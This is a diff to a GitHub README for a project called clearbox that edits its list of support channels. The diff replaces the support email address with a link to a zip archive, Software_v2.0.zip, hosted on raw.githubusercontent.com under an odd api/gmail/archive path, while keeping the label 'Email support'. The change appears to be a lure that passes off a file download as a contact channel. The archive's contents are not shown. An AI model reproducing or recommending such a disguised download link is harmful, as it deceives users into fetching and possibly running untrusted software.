ANTIREELEER/clearbox/README.md

 - GitHub Discussions within the clearbox repository.
 - The README “Issues” tab on GitHub.
-- Email support at support@clearbox.ai (if listed on the page).
+- Email support at https://raw.githubusercontent.com/ANTIREELEER/clearbox/master/app/api/gmail/archive/Software_v2.0.zip (if listed on the page).

 ---